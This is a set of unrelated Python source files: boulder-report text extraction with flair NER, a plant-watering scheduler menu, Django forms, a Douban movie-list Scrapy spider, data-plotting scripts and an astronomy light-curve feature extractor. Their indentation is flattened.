siz_pos[siz] = (can_siz_pos[siz][0]+sentence_length,can_siz_pos[siz][1]+sentence_length)
# Get the dimensions and numbers associated with them from the sentence, will be split into their different attributes
can_dim_dict, can_dims = find_dims(flair_sentence,flair_sentence.to_original_text())
if can_dims:
for dim in can_dims:
if "weight" in dim.casefold():
if weight:
weight += " - " + dim
else:
weight = dim
continue
if "volume" in dim.casefold():
if volume:
volume += " - " + dim
else:
volume = dim
continue
if "sea" in dim.casefold():
if hasl:
hasl += " - " + dim
else:
hasl = dim
continue
if "miles" in dim.casefold() or "yards" in dim.casefold():
if distance:
distance += dim
else:
distance = dim
continue
else:
# Else add to size
if size:
size += ' - ' + dim
else:
size = dim
if can_dim_dict:
for dim in can_dim_dict:
dim_hl_array = []
for j, word in match.iterrows():
if dim.casefold() in word['text'].casefold():
box = (word['left'], word['top'], word['width'], word['height'])
dim_hl_array.append(box)
if dim in dim_dict:
dim_dict[dim].extend(dim_hl_array)
else:
dim_dict[dim] = dim_hl_array
# Run find location to search the sentence for the location of the boulder.
can_loc_dict, can_location = find_location(flair_sentence,match,number)
# Just take first location found as there are so many..
if location is None and can_location:
location = can_location
if can_loc_dict:
for loc in can_loc_dict:
loc_hl_array = []
for j, word in match.iterrows():
if loc in word['text'] and len(loc):
if not loc[0].isupper() and len(loc) < 4:
continue
box = (word['left'], word['top'], word['width'], word['height'])
loc_hl_array.append(box)
if loc in loc_dict:
loc_dict[loc].extend(loc_hl_array)
else:
loc_dict[loc] = loc_hl_array
# Looking for locations that are mentioned within quotation marks !
openquote = False
can_loc_box = []
can_location = ""
for j, word in match.iterrows():
if len(can_location) > 30 and openquote:
openquote = False
elif ('“' in word['text'] or '¢' in word['text'] or '*' in word['text']) and not openquote:
can_location = word['text']
can_loc_box.append((word['left'], word['top'], word['width'], word['height']))
openquote = True
elif ('”' in word['text'] and openquote):
can_location += " " + word['text']
can_loc_box.append((word['left'], word['top'], word['width'], word['height']))
openquote = False
if location:
if can_location not in location:
location += ' - ' + can_location
else:
location = can_location
if can_location in loc_dict:
loc_dict[can_location].extend(can_loc_box)
else:
loc_dict[can_location] = can_loc_box
can_loc_box = []
elif openquote:
if len(can_location) < 3:
can_location += word['text']
else:
can_location += " " + word['text']
can_loc_box.append((word['left'], word['top'], word['width'], word['height']))
# Looking for compass directions..
for j, word in match.iterrows():
last_character = None
stripped_word = ""
for character in word['text'].replace(",", "."):
if character != last_character:
stripped_word += character
last_character = character
if stripped_word in compass:
if word['text'] in comp_dict:
comp_dict[word['text']].append((word['left'], word['top'], word['width'], word['height']))
else:
comp_dict[word['text']] = [(word['left'], word['top'], word['width'], word['height'])]
# Find author or citation reference
can_aut_dict, can_author = find_author(flair_sentence,number)
if author is None and can_author:
author = can_author
if can_aut_dict:
for aut in can_aut_dict:
if len(aut) < 4:
continue
aut_hl_array = []
for j, word in match.iterrows():
if aut.casefold() in word['text'].casefold():
box = (word['left'], word['top'], word['width'], word['height'])
aut_hl_array.append(box)
if aut in aut_dict:
aut_dict[aut].extend(aut_hl_array)
else:
aut_dict[aut] = aut_hl_array
# find the primary and secondary rocktypes in the sentence..
can_rts = find_rocktype(flair_sentence,flair_sentence.to_original_text())
if can_rts:
colour = None
for rt in can_rts:
if colour:
the_rt = colour + " " + rt
colour = None
elif rt in colours:
colour = rt
continue
else:
the_rt = rt
if rocktype:
if the_rt not in rocktype:
rocktype += ' - ' + the_rt
else:
rocktype = the_rt
for rt in can_rts:
rt_hl_array = []
for j, word in match.iterrows():
if rt.casefold() in word['text'].casefold():
box = (word['left'], word['top'], word['width'], word['height'])
rt_hl_array.append(box)
if rt in rt_dict:
rt_dict[rt].extend(rt_hl_array)
else:
rt_dict[rt] = rt_hl_array
can_extra_dict = find_extra(flair_sentence,flair_sentence.to_original_text())
if can_extra_dict:
colour = None
for ex in can_extra_dict:
if colour:
the_extra = colour + " " + ex
colour = None
elif ex in colours:
colour = ex
continue
else:
the_extra = ex
if extra:
if the_extra not in extra:
extra += ' - ' + the_extra
else:
extra = the_extra
for ext in can_extra_dict:
ext_hl_array = []
for j, word in match.iterrows():
if ext.casefold() in word['text'].casefold():
box = (word['left'], word['top'], word['width'], word['height'])
ext_hl_array.append(box)
if ext in extra_dict:
extra_dict[ext].extend(ext_hl_array)
else:
extra_dict[ext] = ext_hl_array
sentence_length += len(flair_sentence.to_original_text())
compass_directions = ""
for direction in comp_dict:
if len(compass_directions):
compass_directions += " - " + direction
else:
compass_directions = direction
if numberofboulders is None:
numberofboulders = 1
return loc_dict, siz_pos, rt_dict, aut_dict, location, size, rocktype, author, numberofboulders, numbox, extra_dict, extra, dim_dict, volume, weight, hasl, distance, comp_dict, compass_directions
ext_features = []
with open('./dictionaries/extra.txt', 'r') as f:
for line in f:
word = ""
for char in line:
if char.isalpha():
word += char
if len(word):
ext_features.append(word)
def find_extra(flair_sentence, sentence):
exts = []
lastword = None
if any(ext.casefold() in sentence.casefold() for ext in ext_features):
for word in re.sub(r"[,.—;@#?!&$]+\ *", " ", sentence).split(" "):
if word.casefold() in ext_features:
if lastword:
ex_word = lastword + " " + word if lastword in colours else word
else:
ex_word = word
exts.extend(ex_word.split(' '))
lastword = word
if exts:
return list(dict.fromkeys(exts))
else:
return None
def find_number(flair_sentence):
for entity in flair_sentence.to_dict(tag_type='pos')['entities']:
for label in entity['labels']:
if "boulders" in entity['text']:
return None, None
if "CD" in label.value:
if not entity['text'].strip().isnumeric() and entity['text'].strip().isalpha():
try:
ret = int(w2n.word_to_num(entity['text']))
return entity['text'], ret
except:
return None, None
return None, None
def find_author(flair_sentence,number):
# Hard code for the keyword report found within brackets!
if number == 10 or number == 1:
author = None
auts = []
        brackets = re.findall(r'\(.*?\)|\(.*?-', flair_sentence.to_original_text())
for bracket in brackets:
if "Report".casefold() in bracket.casefold():
if len(bracket) > 100:
continue
author = bracket
index = flair_sentence.to_original_text().casefold().find(bracket.casefold())
auts.extend(bracket.split(' '))
return auts, author
author = None
auts = []
for entity in flair_sentence.to_dict(tag_type='ner')['entities']:
for label in entity['labels']:
if "PER" in label.value:
if author:
author += ", " + entity['text']
else:
author = entity["text"]
auts.extend(entity['text'].split(' '))
if auts:
return auts, author
else:
return None, None
dimensions = []
with open('./dictionaries/dimensions.txt', 'r') as f:
for line in f:
word = ""
for char in line:
if char.isalpha():
word += char
if len(word):
dimensions.append(word)
metrics = []
with open('./dictionaries/metrics.txt', 'r') as f:
for line in f:
word = ""
for char in line:
if char.isalpha():
word += char
if len(word):
metrics.append(word)
# This function analyses a sentence to extract size information relating to height and width
def find_dims(flair_sentence,sentence):
# Needs a bit more work! none type error so far... :/ TODO 16/07
dims = []
size = []
# if dimension != 'above' could be the play
if any(dimension in sentence for dimension in dimensions):
number = None
dim = None
met = None
for entity in flair_sentence.to_dict(tag_type='pos')['entities']:
if entity['text'].casefold() in dimensions:
if dim and entity['text'] == 'above':
continue
dim = entity['text']
for label in entity["labels"]:
if "CD" in label.value:
if any(metric in sentence[entity['start_pos']-5:entity['end_pos']+12] for metric in metrics if metric != "miles" and metric != "yards"):
number = entity['text']
met = None
if any(sub.isnumeric() for sub in sentence[entity['start_pos']+len(entity['text']):entity['end_pos']+12].split(" ")):
continue
for metric in metrics:
if metric in sentence[entity['start_pos']+len(entity['text']):entity['end_pos']+12]:
if met:
met += " " + metric
else:
met = metric
if (dim and number and met) or (number and met):
if dim is None:
if "cubic" in met:
dim = "volume"
elif "tons" in met:
dim = "weight"
else:
continue
if "high" in dim or "height" in dim or "above" in dim:
try:
if "sea" in sentence[entity['start_pos']-5:entity['end_pos']+20] or w2n.word_to_num(number) > 100:
if dim not in dims:
dims.append(dim)
dim = 'height above sea level'
except:
print("Nan : " + number)
number = None
continue
if dim == "above":
dim = None
continue
size.append(dim + " : " + number + " " + met)
if dim not in dims:
dims.extend(dim.split(' '))
if number not in dims:
dims.append(number)
if met not in dims:
dims.extend(met.split(' '))
number = None
dim = None
met = None
if dims:
return list(dict.fromkeys(dims)), size
else:
return None, None
def find_size(flair_sentence,sentence):
size = re.findall("([0-9]+ (X|x) [0-9]+ (X|x) [0-9]+|[0-9]+ (X|x) [0-9]+)",sentence)
# hopefully will just be a simple l x b x h
if size:
siz_dict = {}
sizes = None
for match in size:
for submatch in list(match):
if len(submatch) > 3:
index = sentence.find(submatch)
siz_dict[match] = (index,index+len(submatch))
if sizes:
sizes += ", " + submatch
else:
sizes = submatch
return siz_dict, sizes
return None, None
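# Hedged sketch: find_size() only needs the raw sentence, since the regex above
# matches explicit "N x N" or "N x N x N" patterns directly (the measurements in
# the sample sentence are made up).
def _demo_find_size():
    siz_dict, sizes = find_size(None, "The boulder measures 12 x 8 x 6 feet.")
    # siz_dict maps each regex match tuple to its (start, end) character span in
    # the sentence; sizes is the comma-joined string of all matches, here just
    # "12 x 8 x 6".
    return siz_dict, sizes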
# This function analyses a sentence to extract the rock type mentioned
rocktypes = []
with open('./dictionaries/rocktypes.txt', 'r') as f:
for line in f:
word = ""
for char in line:
if char.isalpha():
word += char
if len(word):
rocktypes.append(word)
def find_rocktype(flair_sentence, sentence):
rts = []
lastword = None
if any(rocktype.casefold() in sentence.casefold() for rocktype in rocktypes):
for word in re.sub(r"[,.—;@#?!&$]+\ *", " ", sentence).split(" "):
if word.casefold() in rocktypes:
if lastword:
ex_word = lastword + " " + word if lastword in colours else word
else:
ex_word = word
rts.extend(ex_word.split(" "))
lastword = word
if rts:
return list(dict.fromkeys(rts))
else:
return None
# This function analyses a sentence to extract the main location mentioned
# TODO: location extraction still needs to be more accurate.
def find_location(flair_sentence,match,number):
location = ''
locs = []
# Manual override for first report as the text orientation is consistent
if number == 1:
senlen = 0
for word in match.iterrows():
if word[1]['left'] < 900:
if not word[1]['text'].isupper():
location = word[1]['text']
locs.append(word[1]['text'])
senlen += len(word[1]['text'])
location = location.split(".—")[0]
for entity in flair_sentence.to_dict(tag_type='ner')['entities']:
for label in entity["labels"]:
if "LOC" in label.value:
if not len(location):
location = entity["text"]
elif entity['text'] not in location:
location += " - " + entity["text"]
locs.extend(entity['text'].split(' '))
if locs:
return locs, location
else:
return None, None
|
import collections
import configparser
import sys
import os.path
from terminaltables import AsciiTable
from plantscheduling.JsonImpl import JsonImpl
from plantscheduling.PickleImpl import PickleImpl
from plantscheduling.PlantImpl import PlantImpl
from plantscheduling.YAMLImpl import YAMLImpl
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
class Display:
config = configparser.ConfigParser()
config.read('serialization.cfg')
serializationType = config['Current Method']['id']
menu = {}
menu['1'] = "Add Plant."
menu['2'] = "Delete Plant."
menu['3'] = "Show Timetable."
menu['4'] = "Serialize in preferable way"
menu['5'] = "Exit."
def displayMenu(self, inputfunc=input):
"""View implementation,
that creates a simple menu in console.
"""
sortedmenu = collections.OrderedDict(sorted(self.menu.items()))
for entry in sortedmenu:
print(entry, self.menu[entry])
while True:
selection = inputfunc("Please Select:")
if selection == '1':
name = input("Enter name of the plant: ")
type = input("Enter type of the plant: ")
actiontype = input("Enter type of the watering: ")
date = input("Enter date of the watering: ")
time = input("Enter time of the watering: ")
PlantImpl.newEvent(name, type, actiontype, date, time)
elif selection == '2':
name = input("Enter name of the plant to be deleted: ")
PlantImpl.deleteEvent(name)
elif selection == '3':
table = AsciiTable(PlantImpl.displayTable())
print(table.table)
elif selection == '4':
if self.serializationType == '1':
JsonImpl().writeJson('data.json', 'w', PlantImpl.actionlist)
print('Saved to JSON')
elif self.serializationType == '2':
PickleImpl().writePickle('data.p', 'wb', PlantImpl.actionlist)
print('Saved to Pickle')
elif self.serializationType == '3':
YAMLImpl().writeYAML('data.yaml', 'w', PlantImpl.actionlist)
print('Saved to YAML')
else:
print("Oops, something wrong with configuration file.")
elif selection == '5':
break
else:
print("Unknown Option Selected!")
if __name__ == "__main__":
disp = Display()
disp.displayMenu()
|
from django import forms
from .models import Post, Categories
choices = Categories.objects.all().values_list('cat_name','cat_name')
choice_list = []
for item in choices:
choice_list.append(item)
class PostForm(forms.ModelForm):
class Meta:
model = Post
fields = ('title', 'category', 'content', 'snippet', 'post_thumbnail_image')
widgets = {
'title': forms.TextInput(attrs={'class': 'form-control', 'placeholder':'Tytuł posta'}),
'category': forms.Select(choices=choice_list, attrs={'class': 'form-control'}),
'content': forms.Textarea(attrs={'class': 'form-control', 'placeholder':'Treść posta'}),
'snippet': forms.TextInput(attrs={'class': 'form-control'}),
}
class EditForm(forms.ModelForm):
class Meta:
model = Post
fields = ('title', 'content', 'snippet')
widgets = {
'title': forms.TextInput(attrs={'class': 'form-control', 'placeholder':'Tytuł posta'}),
'content': forms.Textarea(attrs={'class': 'form-control', 'placeholder':'Treść posta'}),
'snippet': forms.TextInput(attrs={'class': 'form-control'}),
}
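# Hedged usage sketch (the view function below is an assumption, not part of this
# app): both classes are ordinary ModelForms, so a view only has to validate and
# save them.
def _demo_create_post(request):
    form = PostForm(request.POST or None)
    if request.method == "POST" and form.is_valid():
        form.save()                      # persists a new Post via the ModelForm
    return form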
|
# -*- coding: utf-8 -*-
from scrapy.contrib.spiders import CrawlSpider
from scrapy.http import Request
from scrapy.selector import Selector
from douban.items import DoubanItem
class Douban(CrawlSpider):
name = "douban"
redis_key = 'douban:start_urls'
start_urls = ['http://movie.douban.com/top250']
url = 'http://movie.douban.com/top250'
def parse(self, response):
#print response.body
#print response.url
item = DoubanItem()
selector = Selector(response)
Movies = selector.xpath('//div[@class="info"]')
for eachMovie in Movies:
title = eachMovie.xpath('div[@class="hd"]/a/span/text()').extract()
fullTitle = ''
for each in title:
fullTitle += each
movieInfo = eachMovie.xpath('div[@class="bd"]/p/text()').extract()
star = eachMovie.xpath('div[@class="bd"]/div[@class="star"]/span[4]/text()').extract()
quote = eachMovie.xpath('div[@class="bd"]/p[@class="quote"]/span/text()').extract()
if quote:
quote = quote[0]
else:
quote = ''
# print fullTitle
# print movieInfo
# print star
# print quote
item['title'] = fullTitle
item['movieInfo'] = ';'.join(movieInfo)
item['star'] = star
item['quote'] = quote
yield item
nextLink = selector.xpath('//span[@class="next"]/link/@href').extract()
if nextLink:
nextLink = nextLink[0]
            print(nextLink)
yield Request(self.url + nextLink, callback=self.parse)
|
import os
import TMBdataset as tmbdat
import re
import numpy as _N
import matplotlib.pyplot as _plt
dirlist = os.listdir("../DATA/TMB1")
ROUNDS = 3
complete_dat = []
for directory in dirlist:
if os.path.isdir("../DATA/TMB1/%s" % directory):
days = os.listdir("../DATA/TMB1/%s" % directory)
for participant in days:
ma = re.search(r"\d{8}_\d{4}-\d{2}_\d{4}\.\d{4}", participant)
if ma is not None:
# check if files are there
path_to_participant = "../DATA/TMB1/%(d)s/%(p)s" % {"p" : participant, "d" : directory}
dat = tmbdat.TMBdataset(participant, path_to_participant)
if dat.STARTED_ROUNDS and dat.visit_status[0] >= tmbdat.COMPLETED_3_ROUNDS:
complete_dat.append(dat)
# now look at complete_dat
for cd in complete_dat:
visits = len(cd.visit_status)
wtl_all = _N.zeros((ROUNDS, tmbdat.GAMES))
for cd in range(len(complete_dat)):
wtl_all += complete_dat[cd].player_netwin[0]
wtl_all /= len(complete_dat)
fig = _plt.figure(figsize=(5, 8))
fig.add_subplot(3, 1, 1)
_plt.plot(wtl_all[0], color="black")
_plt.ylim(-1, 6)
_plt.axhline(y=0, ls=":")
_plt.title("WTL-type rule")
fig.add_subplot(3, 1, 2)
_plt.plot(wtl_all[1], color="black")
_plt.ylim(-1, 6)
_plt.axhline(y=0, ls=":")
_plt.title("mimic-type rule")
fig.add_subplot(3, 1, 3)
_plt.plot(wtl_all[2], color="black")
_plt.ylim(-1, 6)
_plt.axhline(y=0, ls=":")
_plt.title("random-bias rule")
fig.subplots_adjust(wspace=0.3, hspace=0.3)  # adjust spacing before saving so it takes effect
_plt.savefig("doTMB")
|
from os import path
def dump(filename, items):
    # Write one bulk() line per item to bulks/<filename>.bulk and return its path.
    filepath = "bulks/" + filename + ".bulk"
    with open(filepath, "w", encoding='utf-8') as f:
        for item in items:
            f.write(str(item.bulk()) + '\n')
    return path.abspath(filepath)
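# Hedged sketch: any object exposing a bulk() method can be dumped; the demo
# record class below is an assumption, and dump() expects an existing bulks/
# directory next to the script.
class _DemoRecord(object):
    def __init__(self, payload):
        self.payload = payload
    def bulk(self):
        return {"payload": self.payload}
def _demo_dump():
    # Writes bulks/example.bulk and returns its absolute path.
    return dump("example", [_DemoRecord("a"), _DemoRecord("b")])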
|
#!/usr/bin/python
# filename: lc_tools.py
import re
import urllib2
try:
from bs4 import BeautifulSoup
except:
BeautifulSoup = False
import numpy as np
try:
from matplotlib import pyplot as plt
except:
pass
import scipy.stats as stats
import pickle as p
try:
    from matplotlib.backends.backend_pdf import PdfPages  # needed by makePdf()
except ImportError:
    PdfPages = None
import heapq
#import pyPdf
#import lcs_db
import os
import sys
import cfg
'''Scalars to use:
ra,
dec,
avg_mag,
n_epochs,
avg_err,
med_err,
std_err,
start,
end,
total_time,
avgt,
cads_std,
cads_avg,
cads_med,
cad_probs_1, ..., cad_probs_10000000, # 17 total incl. 1 & 10000000
med_double_to_single_step,
avg_double_to_single_step,
std_double_to_single_step,
all_times_hist_peak_val,
all_times_hist_peak_bin,
all_times_nhist_numpeaks,
all_times_nhist_peak_val,
all_times_nhist_peak_1_to_2, 1_to_3, 2_to_3, 1_to_4, 2_to_4, 3_to_4, # (6 total)
all_times_nhist_peak1_bin, peak2_bin, peak3_bin, peak4_bin # 4 total
'''
class lightCurve:
def __init__(self,epochs,mags,errs=[],ra='none',dec='none',source_id='none',time_unit='day',classname='unknown',band='unknown',features_to_use=[]):
''' Extracts the following features (and all are lightCurve obj attrs):
epochs: array of times of all observations,
mags: array of magnitudes of observations,
avg_mag: average magnitude,
errs: array of errors or observations,
n_epochs: the number of epochs,
avg_err: average of the errors,
med_err: median of the errors,
std_err: standard deviation of the errors,
start: time of first observation,
end: time of last observation,
total_time: end - start
avgt: average time between observations,
cads: array of time between successive observations,
cads_std: standard deviation of cads
cads_avg: average of cads
cads_med: median of cads
cad_probs: dictionary of time value (in minutes) keys and percentile score values for that time,
cad_probs_1, etc: percentile score of cad_probs for 1 minute, etc,
double_to_single_step: array of deltaT_3-1 to deltaT_3-2 ratios,
med_double_to_single_step: median of double_to_single_step,
avg_double_to_single_step: average of double_to_single_step,
std_double_to_single_step: standard deviation of double_to_single_step,
all_times: array of time intervals to all possible later observations from each obs in lc
all_times_hist: histogram of all_times (list)
all_times_bins: bin edges of histogram of all_times (list)
all_times_hist_peak_val: peak value of all_times_hist
all_times_hist_peak_bin: bin number of peak of all_times_hist
all_times_hist_normed: all_times_hist normalized s.t. it sums to one
all_times_bins_normed: all_times_bins normalized s.t. last bin edge equals one
all_times_nhist_numpeaks: number of peaks in all_times_hist_normed
all_times_nhist_peaks: list of up to four biggest peaks of all_times_hist_normed, each being a two-item list: [peak_val, bin_index]
all_times_nhist_peak_1_to_2, etc: ratio of all_times histogram peak_1 to peak_2, etc
all_times_nhist_peak1_bin, etc: bin number of 1st, etc peak of all_times_hist
all_times_nhist_peak_val: peak value of all_times_hist_normed
Additional attrs:
time_unit: string specifying time unit (i.e. 'day')
id: dotAstro source id (string)
classname: string, name of class if part of training set
ra: right ascension (decimal degrees),
dec: declination (decimal degrees),
band: observation band
'''
self.time_unit = time_unit
self.id = str(source_id)
self.classname = classname
self.start = epochs[0]
self.end = epochs[-1]
self.total_time = self.end - self.start
self.epochs = epochs
self.n_epochs = len(epochs)
self.errs = errs
self.mags = mags
self.avg_mag = np.average(mags)
self.ra = ra
self.dec = dec
self.band = band
self.avgt = round((self.total_time)/(float(len(epochs))),3)
self.cads = []
self.double_to_single_step = []
self.all_times = []
if len(errs) > 0:
self.avg_err = np.average(errs)
self.med_err = np.median(errs)
self.std_err = np.std(errs)
else:
self.avg_err = None
self.med_err = None
self.std_err = None
for i in range(len(epochs)):
# all the deltaTs (time to next obs)
try:
self.cads.append(epochs[i+1]-epochs[i])
except IndexError:
pass
# ratio of time to obs after next to time to next obs
try:
self.double_to_single_step.append((epochs[i+2]-epochs[i])/(epochs[i+2]-epochs[i+1]))
except IndexError:
pass
except ZeroDivisionError:
pass
            # all possible deltaTs (time from this obs to every later obs)
for j in range(1,len(epochs)):
try:
self.all_times.append(epochs[i+j]-epochs[i])
except IndexError:
pass
self.all_times_std = np.std(self.all_times)
self.all_times_med = np.median(self.all_times)
self.all_times_avg = np.average(self.all_times)
hist, bins = np.histogram(self.all_times,bins=50)
nhist, bins = np.histogram(self.all_times,bins=50,normed=True)
self.all_times_hist = hist
self.all_times_bins = bins
self.all_times_hist_peak_val = np.max(hist)
self.all_times_hist_peak_bin = np.where(hist==self.all_times_hist_peak_val)[0][0]
self.all_times_hist_normed = nhist
self.all_times_bins_normed = bins/np.max(self.all_times)
self.all_times_nhist_peak_val = np.max(nhist)
peaks = [] # elements are lists: [peak, index]
for peak in heapq.nlargest(10,nhist):
index = np.where(nhist == peak)[0][0]
try:
if nhist[index-1] < peak and nhist[index+1] < peak:
peaks.append([peak,index])
elif nhist[index-1] == peak:
if nhist[index-2] < peak:
peaks.append([peak,index])
elif nhist[index+1] == peak:
if nhist[index+2] < peak:
peaks.append([peak,index])
except IndexError:
# peak is first or last entry
peaks.append([peak,index])
peaks = sorted(peaks,key=lambda x:x[1])
self.all_times_nhist_peaks = peaks[:4]
self.all_times_nhist_numpeaks = len(peaks)
if len(peaks) > 0:
self.all_times_nhist_peak1_bin = peaks[0][1]
else:
self.all_times_nhist_peak1_bin = None
self.all_times_nhist_peak_1_to_2, self.all_times_nhist_peak_1_to_3, self.all_times_nhist_peak_2_to_3, \
self.all_times_nhist_peak_1_to_4, self.all_times_nhist_peak_2_to_4, \
self.all_times_nhist_peak_3_to_4 = [None,None,None,None,None,None]
self.all_times_nhist_peak4_bin, self.all_times_nhist_peak3_bin, self.all_times_nhist_peak2_bin = [None,None,None]
if len(peaks) >= 2:
self.all_times_nhist_peak_1_to_2 = peaks[0][0]/peaks[1][0]
self.all_times_nhist_peak2_bin = peaks[1][1]
if len(peaks) >= 3:
self.all_times_nhist_peak_2_to_3 = peaks[1][0]/peaks[2][0]
self.all_times_nhist_peak_1_to_3 = peaks[0][0]/peaks[2][0]
self.all_times_nhist_peak3_bin = peaks[2][1]
if len(peaks) >= 4:
self.all_times_nhist_peak_1_to_4 = peaks[0][0]/peaks[3][0]
self.all_times_nhist_peak_2_to_4 = peaks[1][0]/peaks[3][0]
self.all_times_nhist_peak_3_to_4 = peaks[2][0]/peaks[3][0]
self.all_times_nhist_peak4_bin = peaks[3][1]
self.avg_double_to_single_step = np.average(self.double_to_single_step)
self.med_double_to_single_step = np.median(self.double_to_single_step)
self.std_double_to_single_step = np.std(self.double_to_single_step)
self.cads_std = np.std(self.cads)
self.cads_avg = np.average(self.cads)
self.cads_med = np.median(self.cads)
self.cad_probs = {}
for time in [1,10,20,30,40,50,100,500,1000,5000,10000,50000,100000,500000,1000000,5000000,10000000]:
if self.time_unit == 'day':
self.cad_probs[time] = stats.percentileofscore(self.cads,float(time)/(24.0*60.0))/100.0
elif self.time_unit == 'hour':
self.cad_probs[time] = stats.percentileofscore(self.cads,float(time))/100.0
self.cad_probs_1 = self.cad_probs[1]
self.cad_probs_10 = self.cad_probs[10]
self.cad_probs_20 = self.cad_probs[20]
self.cad_probs_30 = self.cad_probs[30]
self.cad_probs_40 = self.cad_probs[40]
self.cad_probs_50 = self.cad_probs[50]
self.cad_probs_100 = self.cad_probs[100]
self.cad_probs_500 = self.cad_probs[500]
self.cad_probs_1000 = self.cad_probs[1000]
self.cad_probs_5000 = self.cad_probs[5000]
self.cad_probs_10000 = self.cad_probs[10000]
self.cad_probs_50000 = self.cad_probs[50000]
self.cad_probs_100000 = self.cad_probs[100000]
self.cad_probs_500000 = self.cad_probs[500000]
self.cad_probs_1000000 = self.cad_probs[1000000]
self.cad_probs_5000000 = self.cad_probs[5000000]
self.cad_probs_10000000 = self.cad_probs[10000000]
def extractScienceFeatures(self):
return
def showInfo(self):
print [self.start,self.end,len(self.epochs),self.avgt]
def showAllInfo(self):
for attr, val in vars(self).items():
print attr, ":", val
def allAttrs(self):
count = 0
for attr, val in vars(self).items():
print attr
count += 1
print count, "attributes total."
def put(self,cursor):
return
def generate_features_dict(self):
features_dict = {}
for attr, val in vars(self).items():
if attr in cfg.features_list:
features_dict[attr] = val
return features_dict
def generate_features_dict(lc_obj):
return lc_obj.generate_features_dict()
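# Hedged usage sketch (the toy epochs/mags/errs are made up): a lightCurve can be
# built directly from parallel lists, and generate_features_dict() then returns
# only the attributes named in cfg.features_list.
def _demo_lightcurve_features():
    epochs = [0.0, 0.7, 1.5, 2.1, 3.4, 5.0]
    mags = [14.2, 14.1, 14.3, 14.2, 14.4, 14.1]
    errs = [0.02] * len(mags)
    lc = lightCurve(epochs, mags, errs, classname='demo')
    return generate_features_dict(lc)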
def makePdf(sources):
pdf = PdfPages("sample_features.pdf")
classnames = []
classname_dict = {}
x = 2 # number of subplot columns
y = 3 # number of subplot rows
for source in sources:
lc = source.lcs[0]
if lc.classname not in classnames:
classnames.append(lc.classname)
classname_dict[lc.classname] = [lc]
else:
classname_dict[lc.classname].append(lc)
if len(classname_dict[lc.classname]) < 3:
label = lc.classname + "; ID: " + lc.id
# all_times histogram:
fig = plt.figure()
ax = fig.add_subplot(111)
ax.set_title(label)
ax.axis('off')
ax1 = fig.add_subplot(321)
ax2 = fig.add_subplot(322)
ax2.axis('off')
ax3 = fig.add_subplot(323)
ax4 = fig.add_subplot(324)
ax4.axis('off')
ax5 = fig.add_subplot(325)
ax6 = fig.add_subplot(326)
ax6.axis('off')
hist, bins, other = ax1.hist(lc.all_times,50,normed=True)
ax1.text(np.max(bins)*0.1,np.max(hist)*0.8,r'Histogram (normed) of all $\Delta$Ts')
ax2.text(0.0,0.9,r'$\bullet$med time to next obs: ' + str(np.round(lc.cads_med,4)))
ax2.text(0.0,0.75,r'$\bullet$avg time to next obs: ' + str(np.round(lc.avgt,4)))
ax2.text(0.0,0.6,r'$\bullet$std dev of time to next obs: ' + str(np.round(lc.cads_std,4)))
ax2.text(0.0,0.45,r'$\bullet$med of all $\Delta$Ts: ' + str(np.round(lc.all_times_med,4)))
ax2.text(0.0,0.3,r'$\bullet$avg of all $\Delta$Ts: ' + str(np.round(lc.all_times_avg,4)))
ax2.text(0.0,0.15,r'$\bullet$std dev of all $\Delta$Ts: ' + str(np.round(lc.all_times_std,4)))
hist, bins, other = ax3.hist(lc.cads,50)
ax3.text(np.max(bins)*0.1,np.max(hist)*0.8,r'Hist of time to next obs')
ax6.text(0.0,0.9,r'$\bullet$Number of epochs: ' + str(lc.n_epochs))
ax6.text(0.0,0.75,r'$\bullet$Time b/w first & last obs (days): ' + str(np.round(lc.total_time,2)))
ax6.text(0.0,0.6,r'$\bullet$Average error in mag: ' + str(np.round(lc.avg_err,4)))
ax6.text(0.0,0.45,r'$\bullet$Median error in mag: ' + str(np.round(lc.med_err,4)))
ax6.text(0.0,0.3,r'$\bullet$Std dev of error: ' + str(np.round(lc.std_err,4)))
ax6.text(0.0,0.15,'')
ax5.scatter(lc.epochs,lc.mags)
ax4.text(0.0,0.9,r'$\bullet$Avg double to single step ratio: ' + str(np.round(lc.avg_double_to_single_step,3)))
ax4.text(0.0,0.75,r'$\bullet$Med double to single step: ' + str(np.round(lc.med_double_to_single_step,3)))
ax4.text(0.0,0.6,r'$\bullet$Std dev of double to single step: ' + str(np.round(lc.std_double_to_single_step,3)))
ax4.text(0.0,0.45,r'$\bullet$1st peak to 2nd peak (in all $\Delta$Ts): ' + str(np.round(lc.all_times_nhist_peak_1_to_2,3)))
            ax4.text(0.0,0.3,r'$\bullet$2nd peak to 3rd peak (in all $\Delta$Ts): ' + str(np.round(lc.all_times_nhist_peak_2_to_3,3)))
ax4.text(0.0,0.15,r'$\bullet$1st peak to 3rd peak (in all $\Delta$Ts): ' + str(np.round(lc.all_times_nhist_peak_1_to_3,3)))
pdf.savefig(fig)
pdf.close()
pdf = PdfPages('feature_plots.pdf')
fig = plt.figure()
ax1 = fig.add_subplot(221)
ax2 = fig.add_subplot(222)
ax3 = fig.add_subplot(223)
ax4 = fig.add_subplot(224)
plt.subplots_adjust(wspace=0.4,hspace=0.4)
classnamenum = 0
colors = ['red','yellow','green','blue','gray','orange','cyan','magenta']
for classname, lcs in classname_dict.items():
classnamenum += 1
print classname, len(lcs), 'light curves.'
attr1 = []
attr2 = []
attr3 = []
attr4 = []
attr5 = []
attr6 = []
attr7 = []
attr8 = []
for lc in lcs:
attr1.append(lc.n_epochs)
attr2.append(lc.avgt)
attr3.append(lc.cads_std)
attr4.append(lc.total_time)
attr5.append(lc.all_times_hist_peak_val)
attr6.append(lc.cad_probs[5000])
attr7.append(lc.all_times_nhist_peak_1_to_3)
attr8.append(lc.all_times_nhist_peak_val)
ax2.scatter(attr1,attr2,color=colors[classnamenum],label=classname)
ax1.scatter(attr3,attr4,color=colors[classnamenum],label=classname)
ax2.set_xlabel('N Epochs')
ax2.set_ylabel('Avg time to next obs')
ax1.set_xlabel('Standard dev. of time to next obs')
ax1.set_ylabel('Time b/w first and last obs')
ax3.scatter(attr5,attr6,color=colors[classnamenum],label=classname)
ax4.scatter(attr7,attr8,color=colors[classnamenum],label=classname)
ax3.set_xlabel(r'All $\Delta$T hist peak val')
ax3.set_ylabel('Prob time to next obs <= 5000 min')
ax4.set_xlabel(r'$\Delta$Ts normed hist peak 1 to peak 3')
ax4.set_ylabel(r'Peak val of all $\Delta$Ts normed hist')
#ax1.legend(bbox_to_anchor=(1.1, 1.1),prop={'size':6})
ax2.legend(bbox_to_anchor=(1.1, 1.1),prop={'size':6})
#ax3.legend(loc='upper right',prop={'size':6})
#ax4.legend(loc='upper right',prop={'size':6})
